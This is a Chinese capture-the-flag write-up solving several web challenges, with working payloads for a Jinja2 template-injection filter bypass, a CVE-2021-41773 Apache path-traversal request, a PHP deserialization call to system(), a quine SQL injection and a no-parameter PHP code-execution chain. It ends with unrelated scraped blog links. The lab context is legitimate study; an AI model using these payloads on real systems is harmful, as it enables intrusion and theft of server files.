NSSCTF第十页(2)

[HNCTF 2022 WEEK3]ssssti

题目提示是jinja2模板

怎么感觉之前做过,看到了注入

随便进行一下注入,发现了过滤

大致的黑名单

复制代码
'
"  
_  
args   -- 无法使用 request.args
os   -- 无法导入os
不允许post  -- 无法使用 request.value

正常用的payload

复制代码
{{self.__dict__._TemplateReference__context.lipsum.__globals__.__builtins__.open("/flag").read()}}

因为过滤了东西,所以就可以用request.cooike来进行注入

get:

?name={{self[request.cookies.c][request.cookies.d][request.cookies.e][request.cookies.f][request.cookies.g].open(request.cookies.z).read()}}

cookie:

c=dict;d=_TemplateReference__context;e=lipsum;f=globals;g=builtins;z=flag

得到flag

[GFCTF 2021]Baby_Web

源码

看到标签提示说是有CVE-2021-41773漏洞

上网查一下:

【精选】Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )-CSDN博客

根据漏洞存在条件进行注入(之前做过这个漏洞,目录穿越)

不知道为什么我的bp没有显示

正常的回显:

当前目录是/var/www/html/,那么上层目录就是/var/www/。源码提示说:源码藏在上层目录xxx.php.txt里面,猜测xxx应该包括了index。

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/index.php.txt HTTP/1.1

得到了源码:

<h1>Welcome To GFCTF 12th!!</h1>

<?php

error_reporting(0);

define("main","main");

include "Class.php";

temp = new Temp(_POST);

temp-\>display(_GET['filename']);

?>

<!--源码藏在上层目录xxx.php.txt里面,但你怎么才能看到它呢?-->

暗示我们还有一个class.php文件

尝试访问:

得到源码

<?php

defined('main') or die("no!!");

Class Temp{

private $date=['version'=>'1.0','img'=>'https://www.apache.org/img/asf-estd-1999-logo.jpg'];

private $template;

public function __construct($data){

this-\>date = array_merge(this->date,$data);

}

public function getTempName(template,dir){

if($dir === 'admin'){

this-\>template = str_replace('..','','./template/admin/'.template);

if(!is_file($this->template)){

die("no!!");

}

}

else{

$this->template = './template/index.html';

}

}

public function display(template,space=''){

extract($this->date);

this-\>getTempName(template,$space);

include($this->template);

}

public function listdata($_params){

$system = [

'db' => '',

'app' => '',

'num' => '',

'sum' => '',

'form' => '',

'page' => '',

'site' => '',

'flag' => '',

'not_flag' => '',

'show_flag' => '',

'more' => '',

'catid' => '',

'field' => '',

'order' => '',

'space' => '',

'table' => '',

'table_site' => '',

'total' => '',

'join' => '',

'on' => '',

'action' => '',

'return' => '',

'sbpage' => '',

'module' => '',

'urlrule' => '',

'pagesize' => '',

'pagefile' => '',

];

$param = $where = [];

_params = trim(_params);

$params = explode(' ', $_params);

if (in_array($params[0], ['list','function'])) {

params\[0\] = 'action='.params[0];

}

foreach ($params as $t) {

var = substr(t, 0, strpos($t, '='));

val = substr(t, strpos($t, '=') + 1);

if (!$var) {

continue;

}

if (isset(system\[var])) {

system\[var] = $val;

} else {

param\[var] = $val;

}

}

// action

switch ($system['action']) {

case 'function':

if (!isset($param['name'])) {

return 'hacker!!';

} elseif (!function_exists($param['name'])) {

return 'hacker!!';

}

$force = $param['force'];

if (!$force) {

$p = [];

foreach ($param as $var => $t) {

if (strpos($var, 'param') === 0) {

n = intval(substr(var, 5));

p\[n] = $t;

}

}

if ($p) {

rt = call_user_func_array(param['name'], $p);

} else {

rt = call_user_func(param['name']);

}

return $rt;

}else{

return null;

}

case 'list':

return json_encode($this->date);

}

return null;

}

}

开始代码审计:

index.php.txt

1、实例化了一个Temp类对象,并且向构造方法传参,参数是所有POST提交的变量。

2、调用了Temp类中display方法并且传参,参数是GET方式提交的filename变量。

[GFCTF 2021]Baby_Web(CVE-2021-41773) 从一道题入门PHP代码审计 (保姆级)_Jay 17的博客-CSDN博客

[HZNUCTF 2023 preliminary]ppppop

主页是空的,源代码也没有,扫一下

扫了但是等于没扫

抓一下包发现有东西 好像base64编码,看看

解码发现是序列化

改了一下对象属性个数发现没有用

把0改成1看看 (相当于改了b属性的属性值)

发现出现了源码

重新抓包放包

很简单的一个php反序列化

<?php

class A {

public $className="B";

public $funcName="system";

public $args="ls";

}

class B {

}

$a = new A();

echo base64_encode(strrev(serialize($a)));

?>

php strrev函数的使用方法_php笔记_设计学院

payload用post传参

payload=fTsidm5lIjozOnM7InNncmEiOjQ6czsibWV0c3lzIjo2OnM7ImVtYU5jbnVmIjo4OnM7IkIiOjE6czsiZW1hTnNzYWxjIjo5OnN7OjM6IkEiOjE6Tw==

得到flag env是环境变量 ls 没显示出来flag,找了好多,最后在env里找到了

[HDCTF 2023]LoginMaster

尝试登录admin/123456,发现不行

输入admin/admin

话不多说,直接开扫,就扫到一个robot.txt

访问:

一个正则函数,看标签知道是一个quine注入

诶,还真有,分析一下,这应该是他的waf源码

没有其他回显,并且把大部分东西都过滤掉了

我们看到sleep,有意无意都会想到时间盲注,那这里他把sleep过滤了,怎么办呢

payload

username:admin

password:

1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

得到flag

[HNCTF 2022 WEEK2]Canyource

访问robots.txt得到

看着就是无参数rce

无参数RCE总结_get_defined_vars-CSDN博客

highlight_file() show_source() 都被禁了 利用 echo(readfile())来读取

localeconv() -- 函数返回一个包含本地数字及货币格式信息的数组 第一个是.

pos() -- 返回数组中的当前单元, 默认取第一个值

next -- 将内部指针指向数组下一个元素并输出

scandir() -- 扫描目录

array_reverse() -- 翻转数组

array_flip() - 键名与数组值对调

readfile()

array_rand() - 随机读取键名

var_dump() - 输出数组,可以用print_r替代

file_get_contents() - 读取文件内容,show_source,highlight_file echo 可代替

get_defined_vars() - 返回由所有已定义变量所组成的数组

end() - 读取数组最后一个元素

current() - 读取数组的第一个元素

#php内置函数

正则表达式:

/[^\W]+\((?R)?\)/

\W代表匹配非字符

[^abc]代表匹配非abc以外的元素

R代表当前正则匹配后的结果

?惰性匹配,匹配零次或一次

\转义字符

也就是说,题目要求payload格式为()的嵌套,因为他会递归匹配,判断[...]()替换为空后的结果是否等于;

payload:?code=echo(readfile(next(array_reverse(scandir(pos(localeconv()))))));

做到现在,发现rce都是大同小异,无数字字母就用取反异或,自增,无参数就用这几个函数来写payload,难一点的反序列化构造pop链也是函数利用,看哪个魔术方法利用哪个魔术方法,到底还是函数

相关推荐
CoderJia程序员甲5 分钟前
重学SpringBoot3-Spring WebFlux之HttpHandler和HttpServer
java·spring boot·reactor·1024程序员节
chuk.12 分钟前
【JAVA】利用钉钉自定义机器人监控NACOS服务,实现实时下线通知
java·机器人·钉钉
weixi_kelaile52012 分钟前
ai智能语音电销机器人可以做哪些事情?
java·linux·服务器·人工智能·机器人·云计算·腾讯云
hummhumm16 分钟前
Oracle 第13章:事务处理
开发语言·数据库·后端·python·sql·oracle·database
@尘音18 分钟前
QT——记事本项目
开发语言·qt
书鸢123620 分钟前
力扣每日一题合集
java·算法·leetcode
童先生20 分钟前
python 用于请求chartGpt DEMO request请求方式
开发语言·python
qing_04060321 分钟前
C++——string的模拟实现(上)
开发语言·c++·string
魔道不误砍柴功22 分钟前
Java 中 String str = new String(“hello“); 里面创建了几个对象?
java·开发语言·string·new
菜菜-plus1 小时前
微服务技术,SpringCloudAlibaba,Redis,RocketMQ,Docker,分库分表
java·spring boot·redis·spring cloud·docker·微服务·java-rocketmq